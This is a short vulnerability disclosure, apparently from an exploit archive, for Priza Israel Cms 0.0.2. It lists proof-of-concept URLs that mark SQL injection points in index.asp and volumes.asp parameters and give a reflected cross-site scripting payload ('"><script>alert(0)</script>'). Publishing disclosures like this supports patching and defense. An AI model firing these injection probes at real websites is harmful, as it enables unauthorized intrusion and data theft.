标题: Priza Israel Cms SQL Injection / XSS Multiple Vulnerability
作者: BHG Security Center
软件地址:
影响版本: [0.0.2]
测试平台: ubuntu 11.04
发现者:
    - Net.Edit0r (Net.edit0r [at] att [dot] net)
       - G3n3Rall (Ant1_s3cur1ty [at] yahoo [dot] com)
 
-----------------------------------------------------------------------------------------
Priza Israel Cms SQL Injection / XSS Multiple Vulnerability
-----------------------------------------------------------------------------------------
 
Author : BHG Security Center
 
---------------------------------------------------------------------------
 
PoC/Exploit:
~~~~~~~~~~
 
~ [PoC] ~: /website_path/index.asp?p_id=201&id=[SQLi]
 
~ [PoC] ~: /website_path/index.asp?page_id=[SQLi]
 
~ [PoC] ~: /website_path/volumes.asp?id=18
 
~ [PoC] ~: /website_path/index.asp?action=find&page_id=28&string=[Xss]
 
~~~~~~~~ 测试
 
~ [PoC] ~: /path/index.asp?p_id=201&id=[SQLi]
 
~ [PoC] ~: /path/index.asp?action=find&page_id=28&string="><script>alert(0)</script>
 
 
 
-------------------------------- [ EOF ] ----------------------------------